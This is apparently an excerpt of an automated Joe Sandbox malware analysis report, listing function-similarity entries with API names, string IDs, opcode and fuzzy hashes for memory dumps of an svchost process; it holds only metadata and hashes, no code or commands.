                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: 1d70674bb22af0eea2efe58e9d6c54012ce5ada9e496495a99503cc056f162cf
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: 0871A332E2878149F7669F26EB483AAB7A4F745BA4F46003ADF4943B99DF35C5048B40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: 414ca988c487fb73155da2be5319deebbc18a1b76d39225f553441e2a6832cd4
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: EB71E232E38B8149FF669F26FA483AE67A0F745BA4F540056DF4953B99DF34C5048B00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: bca2ae18a234ca1af5fec555f184cecc5745655e0ca5998444e56598be94f227
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: E151C732E2D78149F7669E2EB75C3AAB651F7857A0F424035CF8A03BA9CB75C8018F40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: 4767eb743787d0acac57021502b6c320e35b019734e55622105f45cdc07771bd
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: 0751D932E2C78149FF769E2BB65C36AA651F7857A0F110165DF8A13B99CB79C8018F40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: 8d1b77503104e348ef112e1c390852a768af9406004dbd544895343cf938cf7c
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: BA41B436F29A5099FB219F36F5493A9B7A0F7887A4F404021EF4E87B54DB38C501CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: c2bbf9029e049bffee44919c2b4fdb4bf3cc90c6fe5f71a35a4d35fb3f419bbb
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: 2841A372F29A8099FB219F25F54879AA7A0F7887A4F404025EF8E87798DB3DC541CF40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: 0293f51d64dbaa5269c64abc09c17d4b466a83feb48d1200df15e6a1e07e2297
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: 2C114D36A18B808AEB61DF15F54429AB7A4F7C8B90F54412AEF8D43B19DF38C444CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: 5a81ab50e6946cda1fd16430c748141510062dac5ee7ca26027533a194b77aa5
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: FD113836A1CB808AEB61DF16F54469AB7A0F7C8BA0F544126EF8D83B19DF38C454CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: 4cc212ae7e3ea790dc4a9f42fdc077fbdc1531c1a78d6ff363b1f7a8c2206146
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: 47112136A28B8086FB628F15F54435977A5F788BA8F194221DF8D17764DF3CC555CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: 63dd0cf09de656d245bfd650747a0b6f425ed4c86e9872dd7c13fbebae0dfe19
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: F7112E32A28B8086EF628F15F54435977A5F788BA8F584261DF8D07B68DF3CC555CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: afb62c29c7847a69b7f6b41833b908b68943977d3821eebdd8dde6b4262898a8
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: CDF0E925F3879485FB076F55F6081A53320AB88BA0F454026AB4903B25CF38C458CF00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: b1fba158d9aadeab83c15e6daab3c031668e4e334999ca927d87b74943a4301f
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: 3FF05421F3C78495FB076B41F6489556361EB88BA0F455015AB5D07B55CF38C559CF00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2635445548.0000029B91DD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B91DD0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b91dd0000_svchost.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: 91a7777d55e9c68d980e8430181fc63d48e8dcd95e2a56e62b69fec309374882
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: F5E092257205459AFE07DB51F7482E426219F84740F5A5125D72906652CF38C886FB10
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: e9500933f9dbb044619847991382a3e8d18b826e78f83824d7e80daa3c859f0b
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: 2CE06565F3864495FB075F64FA0C6A53321ABC87A0F494026D71906255CF38C859CF04
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: df245448416851ffdf1788cdc81c907b50fec5b4a0f721f170b003bfa5b85828
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: CEE06D61E3C64499FF0B5B50FA08AA82362AB88BA0F888022DB0D06255CF38C859CF00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: 24e952d6facaf0b42332811f8c15580390224ccbb743d0e99c4462c4483d3aa4
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: F421A726E18B9089FB529F69F50826AF3A4FB84BA4F054125DFCC47B14EF78C542CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: 700f557b180df9136a5c64dc9698ff10a7cc329b8a59f04c22e2cb3883c3d761
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: 7B217126E1CF9089FF529F69B50825AF3A0FB88BA4F054111DF8C47B14EF78C5828B00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: 2397a6ff4d7ed101b8dd00036cf46f17d3378354e60734d59a649f480c8a5633
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: 96E06DB5E21610CAF705AF72E80836936E5FB88F21F48C024CA0907350DF7D849ACB40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: 7cfa45c325f4326468341ed6818c342548e67e0008a4736dd6a743c44dea8bd8
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: 36E0ED71E616008AF706AF76E91875976E1FB88F61F49C024CA4D07350DF7D859ACB90